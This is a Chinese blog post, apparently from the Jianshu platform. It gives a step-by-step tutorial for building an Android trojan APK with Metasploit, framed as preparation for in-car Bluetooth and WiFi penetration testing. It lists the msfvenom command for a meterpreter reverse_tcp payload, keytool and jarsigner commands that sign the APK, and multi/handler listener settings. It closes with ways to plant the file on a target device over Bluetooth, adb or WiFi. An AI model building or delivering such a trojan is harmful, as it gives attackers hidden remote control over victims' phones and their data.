选中攻击目标-生成木马程序(签名认证)

最近工作需要研究车载蓝牙和WIFI相关的信息安全测试,所以在潜心学习渗透相关的知识。
渗透测试过程中,学会自己制作木马程序很有必要。下面的例子就是我使用kali Linux生成Android系统木马程序(apk格式文件)的步骤,希望可以给需要的朋友提供一些思路。

工具: metasploit
1、生成木马程序
生成方式:利用msf模块中的msfvenom模块
原理:
msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > test.apk

(LHOST/ LPORT 对应kali虚拟机的IP和端口,端口自己设置,和其他端口不冲突即可)

2、为了木马的兼容性为其配置签名,并验证
1)创建证书:
keytool -genkey -V -keystore apk-trojan-key.keystore -alias test -keyalg RSA -keysize 1024 -validity 999
注意:这里alias参数后跟apk文件夹的文件名,文件名参考第二部生成,可自行设置。
2)签名:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore test.apk apk
3)验证:
jarsigner -verify -verbose test.apk

3、打开msf,启动监听
use exploit/mutli/handler
set payload android/meterpreter/reverse_tcp # set <Payload name>
set LHOST {ip}
set LPORT {port}
show options
exploit

注意:这个只是生成木马程序的过程,步骤2完成后,需要通过有效途径,将木马程序植入到目标主机,才可以通过步骤3对目标进行进一步的监听。

可以是通过蓝牙文件传输,adb命令,WiFi等各种途径植入,根据实际渗透程度决定。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容